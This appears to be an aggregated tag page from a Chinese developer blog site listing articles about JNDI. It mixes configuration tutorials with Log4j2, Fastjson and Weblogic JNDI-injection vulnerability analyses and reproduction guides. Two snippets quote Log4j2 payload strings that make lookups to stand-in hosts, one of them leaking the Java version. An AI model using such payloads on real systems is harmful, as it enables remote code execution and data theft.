jndi 第5页

Spring源码深度解析：一、Spring整体架构和源码环境搭建

SpringContext：继承BeanFactory，提供上下文信息，扩展出JNDI、EJB、电子邮件、国际化等功能。Spri

代码的知行者·2023-06-10 06:27

JDBC和JNDI区别

引自：https://blog.csdn.net/fujunsfzh/article/details/53404167

endlessloop222·2023-06-10 00:41

Java EE开发系列教程 - 添加JPA模块

指定一个Datasource名称和JNDI名称。

前端罗欢·2023-06-09 16:02

CVE漏洞复现-CVE-2021-2109 Weblogic Server远程代码执行

CVE-2021-2109中，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。该漏洞为Weblogic的远程代码执行漏洞，主要由JNDI注入，导致攻

私ははいしゃ敗者です·2023-06-08 23:39

EJB教程_编程入门自学教程_菜鸟教程-免费教程分享

，环境设置，应用服务器，容器，企业Bean，注释，会话，无状态会话，有状态会话，消息驱动，实体Bean，持久性，远程接口，查找，生命周期，接口，拦截器，可嵌入对象，Blob/Clobs，事务，安全性，JNDI

菜鸟一记·2023-04-20 20:31

Log4j2史诗级漏洞导致JNDI注入问题探析

背景ApacheLog4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。大多数情况下，开发者可能会将用户输入导致的错误信息写入日志中，比如在用户登录的时候打印一些异常信息，如xxx密码输入错误超过5次，账号被锁定；xxx账号已被锁定；xxx账号频繁异地登录。前不久，Apache开源项目Log4j的远程代

翎野君·2023-04-20 14:10

利用 Java Agent 动态修补 Log4j2 漏洞的好方法被我找到了

1、前言ApacheLog4j2JNDI注入漏洞（CVE-2021-44228）持续发酵，目前网络上提供了多种修补方案，如更新至最新版本、通过配置禁用lookup特性、删除org/apache/logging

「已注销」·2023-04-17 21:53

《Spring源码深度解析》

SpringContext：继承BeanFactory，提供上下文信息，扩展出JNDI、EJB、电子邮件、国际化等功能。SpringDAO：提供了JDBC的抽象层，还提供了声明性事务管理方法。

Byte空间·2023-04-17 04:48

CVE-2021-44228漏洞复现

Log4j-2中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成

YPL8·2023-04-16 21:51

Quartz官方教程翻译系列-Lesson 1

部分Quartz用户可能会在JNDI存储上持有一个工厂实例,其他使用者可能发觉直接实例化和使用工厂实例同样容易(或更容易)(正如以下的例子)。

很大气·2023-04-15 20:29

Spring诞生的背景

各大厂商为了占领市场，对规范制定也是大力支持，所以一起为J2EE定制了很多的规范：Servlet、JSP、JMS、JTA、JNDI、JDBC、RMI、JavaMail、XML、E

梦孤·2023-04-15 13:10

Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现

文章目录前言影响范围黑盒发现复现准备JNDILADPRMI漏洞复现Dnslog数据外带使用工具进行反弹shell防御与绕过防御绕过参考前言Apachelog4j是Apache的一个开源项目，Java的日志记录工具

今天是几号·2023-04-13 23:22

FastJson 反序列化漏洞原理分析

FastJson反序列化漏洞原理分析FastJson简介漏洞原理FastJson序列化操作序列化反序列化调用链分析原理利用过程分析RMI的实现JNDI服务器端代码构造总结1.fastjson利用过程2.

Buffedon·2023-04-13 14:54

Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)

Log4j的JNDI支持并没有限制可以解析的名称。一些协议像rmi:和ldap:是不安全的或者可以允许远程代码执行。复现过程首先进入vulhub靶

芝士TOM·2023-04-13 01:18

Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现

Log4j2在特定的版本中由于启用了lookup功能，导致存在JNDI漏洞。

未完成的歌~·2023-04-12 12:13

JNDI 注入漏洞的前世今生

前两天的log4j漏洞引起了安全圈的震动，虽然是二进制选手，但为了融入大家的过年氛围，还是决定打破舒适圈来研究一下JNDI注入漏洞。JNDI101首先第一个问题，什么是JNDI，它的作用是什么？

有价值炮灰·2023-04-11 19:45

Apache Log4j2 - JNDI RCE漏洞攻击保姆级教程（仅供测试请勿攻击他人）

ApacheLog4j2-JNDIRCE漏洞攻击保姆级教程（仅供测试请勿攻击他人）文章目录ApacheLog4j2-JNDIRCE漏洞攻击保姆级教程（仅供测试请勿攻击他人）一、前言二、被攻击端三、攻击端

格一物·2023-04-11 15:33

JNDI

开发JavaWeb应用，必须使用一个JavaWeb服务器，JavaWeb服务器都内置数据源。Tomcat：数据源只需要配置服务器即可。配置数据源的步骤：1、拷贝数据库连接的jar到tomcatlib目录下2、配置数据源XML文件a)如果把配置信息写在tomcat下的conf目录的context.xml中，那么所有应用都能使用此数据源。b)如果是在当前应用的META-INF中创建context.xm

神豪VS勇士赢·2023-04-11 09:44

Spring中获得dataSurce对象的方法

转载地址：http://www.oschina.net/code/snippet_117958_4699在Spring框架中有如下3种获得DataSource对象的方法:1.从JNDI获得DataSource

舟之桥·2023-04-08 20:22

Java反序列化和JNDI注入

一、反序列化常见利用类利用类的作用：加载类或者执行命令。//类加载（1）com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl（BeanComparator、EqualsBean/ToStringBean可以间接调用TemplatesImpl）（2）java.util.ServiceLoader$LazyIterator/com.sun

wespten·2023-04-07 07:32

Dubbo进阶

作用：做服务的扩展，使用SPI机制的优势是实现解耦，使得第三方服务模块的装配控制逻辑与调用者的业务代码分离简介：破坏双亲委派模型之一，在JNDI标准服务中，它存在的目的是对资源进行查找和集中管理，它需要

Alan Lei·2023-04-01 17:10

漏洞深度分析|CVE-2023-25141 sling-org-apache-sling-jcr-base存在JNDI注入漏洞

项目介绍ApacheSling提供对可插入资源提供程序的支持。虽然这允许将自定义数据提供程序非常灵活和高效地集成到Sling中，但这种集成是在Sling的资源API级别上完成的。可能依赖于能够将资源适配到JCR节点并继续使用JCRAPI的遗留代码将不适用于此类资源提供者。为了支持遗留代码，这个包提供了一个SPI接口org.apache.sling.jcr.base.spi.RepositoryMo

棱镜七彩·2023-04-01 05:08

漏洞预警|Apache Sling JCR Base 存在JNDI注入漏洞

棱镜七彩安全预警近日网上有关于开源项目ApacheSlingJCRBase存在JNDI注入漏洞，棱镜七彩威胁情报团队第一时间探测到，经分析研判，向全社会发起开源漏洞预警公告，提醒相关安全团队及时响应。

棱镜七彩·2023-04-01 05:38

开源漏洞深度分析|CVE-2022-34916 JNDI命令执行漏洞

项目地址WelcometoApacheFlume—ApacheFlume漏洞概述当攻击者控制目标LDAP服务器时，如果配置使用带有JNDILDAP数据源UR

棱镜七彩·2023-04-01 05:37

C3P0（数据库连接池）详解

一、定义C3P0是一个开源的JDBC连接池，它实现了数据源与JNDI绑定，支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。

five小点心·2023-03-31 18:59

什么是Spring上下文

Spring上下文包括企业服务，例如JNDI、EJB、电子邮件、国际化、校验和调度功能。Spring上下文就是系统启动的时候Spring会读取它的配置文件装载到上下文到内存，依赖注入...

水煮帝国·2023-03-31 18:58

Tomcat的基本使用及部署Java Web项目

包含13项技术规范:JDBC、JNDI、EJB、RMI、JSP、Serv

子修01·2023-03-29 05:49

使用JMX监控Tomcat示例代码

目录示例代码完整的示例代码文件示例代码StringjmxURL="service:jmx:rmi:///jndi/rmi://192.168.10.93:8999/jmxrmi";JMXServiceURLserviceURL

·2023-03-29 01:58

Log4j 严重漏洞修最新修复方案参考

CVE-2021-44228，原理上是log4j-core代码中的JNDI注入漏洞。这个漏洞可以直接导致服务器被入侵，而且由于“日志”场景的特性，攻击数据可以多层传导，甚至可以威胁到纯内网的服务器。

Javaesandyou·2023-03-28 21:48

day18_jdbc

模拟代码三、编写标准的数据源：javax.sql.DataSource接口四、Connection的close方法不要关闭链接装饰设计模式代理模式：静态代理动态代理五、开源数据源的使用DBCPC3P0JNDI

csdn_AF·2023-03-24 03:54

Jetty 简单安装和部署 jenkins

Jetty提供了一个web服务器和servlet容器，另外还提供了对HTTP/2、WebSocket、OSGi、JMX、JNDI、JAAS和许多其他集成的支持。

acc8226·2023-03-21 17:04

关于log4j2远程代码执行漏洞详细复现过程

1、漏洞重现说明log4j-2远程代码执行漏洞是因为log4j的版本中存在jndi(JavaNamingandDirectoryInterface)注入漏洞，jndi注入是利用的动态类加载机制完成攻击的

freeok·2023-03-17 00:41

2020-02-20

链接：https://pan.baidu.com/s/1XlofAJnDizpgH2BsgD2NAw提取码：qBm9眼神交流.E27.200217。

楚带宋·2023-03-15 23:50

log4j2漏洞原理详解、漏洞复现及漏洞利用

在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的参数进行JNDI注入，执行任意代码

Cwillchris·2023-03-13 16:04

Apache Log4j2远程代码执行漏洞风险处理办法

1、漏洞描述一个ApacheLog4j2反序列化远程代码执行漏洞细节已被公开，ApacheLog4j-2中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码

净源·2023-03-11 12:44

关于Log4j2漏洞的排查、修复和检验

你自己的项目能换，如果像遇到es这种换不了的，你还是要面对log4j2三演示3.1.漏洞检测这里采用的是利用jndi访问ldap来测试经过测试我发现了个前提条件：必须手动加入log4j2的包

百恼神烦·2023-03-10 14:23

配合服务定位器模式使用JETPACK

介绍服务定位器模式服务定位器模式（ServiceLocatorPattern）用在我们想使用JNDI查询定位各种服务的时候。考虑到为某个服务查找JNDI的代价很高，服务定位器模式充分利用了缓存技术。

聪葱忙忘·2023-03-10 12:53

利用本地类突破JDK高版本限制进行JNDI注入

前言一般情况下，我们在进行JNDI注入时会参考JDK的版本限制，具体的修复可以参考下图JDK对于JNDI注入的修复但如果JDK大于图中版本时，就不能进行JNDI注入了吗？

清水川崎·2023-03-09 19:21

JNDIExploit使用方法

JNDIExploit一款用于JNDI注入利用的工具，大量参考/引用了RogueJNDI项目的代码，支持直接植入内存shell，并集成了常见的bypass高版本JDK的方式，适用于与自动化工具配合使用。

zxl2605·2023-03-01 09:14

TomCat连接池与JNDI

目录一、理解JNDI1.简介2.作用范围3.配置方法二、为什么要使用连接池?

千小半·2023-02-20 16:58

Apache Log4j 远程代码执行漏洞源码级分析

漏洞的前因后果漏洞描述漏洞评级影响版本安全建议本地复现漏洞本地打印JVM基础信息本地获取服务器的打印信息log4j漏洞源码分析扩展：JNDI危害是什么？

被称为L的男人·2023-02-17 12:43

Fastjson反序列化命令执行漏洞复现

JNDI是一个接口，在这个接口下会有多种目录系统服务的实现，通过名称等去找到相关的对象，并把它下载

book4yi·2023-02-17 11:21

用友NC反序列化漏洞简单记录（DeleteServlet、XbrlPersistenceServlet等）

0x2分析nc这个除了反序列化还有其他的利用，如JNDI、文件上传等。先从接口入手，最开始的接口应该是/servlet/~ufofr/DeleteServlet，把nc源码下下来，再去搜集下N

gelinlang·2023-02-03 14:34

log4j2远程代码执行

2、漏洞验证把服务器修改成你的服务器地址，即可得到响应的响应${jndi:ldap://${sys:java.version}.collaborator.com}

心晴_32f8·2023-02-01 21:39

Eclipse配置JNDI的方式

第一种全局配置当你在Eclipse中添加完tomcat时，那么在Eclipse哪里就有一个servers项目，在servers项目下的context.xml文件中加入如下代码，就可以了第二种局部配置在你web项目下的/WebContent/META-INF目录下新建content.xml，加入以下代码就可以了

superczb·2023-01-26 22:41

多数据源配置

目录什么是数据源数据源有哪些DriverManagerDataSourceDBCP数据源C3P0数据源JNDI数据源多数据源的配置多数据源配置(Spring)-DriverManagerDataSource

骆驼整理说·2023-01-20 14:35

视频教程-Oracle数据库开发之PL/SQL基础实战视频课程-Oracle

熟练掌握J2EE平台开发技能，包括CoreJava、Servlet、SSH、JSP、EJB、JNDI、JDBC、JTS等技术刘英杰¥39.00立即订阅扫码下载「CSDN程序员学院APP」，1000+技术

weixin_29260433·2023-01-18 03:46

蓝队面试题

由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向服务器发送恶意的数据，触发log4j2组件的缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。

倔强的梦想gggg·2023-01-12 12:31

Java 中的序列化安全漏洞梳理

背景现阶段公司会进行季度的安全巡检，扫描出来的Java相关漏洞，无论是远程代码执行、还是JNDI注入，基本都和Java的序列化机制有关。

Java面试那些事儿·2023-01-06 10:37

【JavaWeb】Tomcat的入门使用

包含13项技术规范:JDBC、JNDI、EJB、RMI、JSP、Ser

黑洞晓威·2023-01-05 17:35

推荐频道

jndi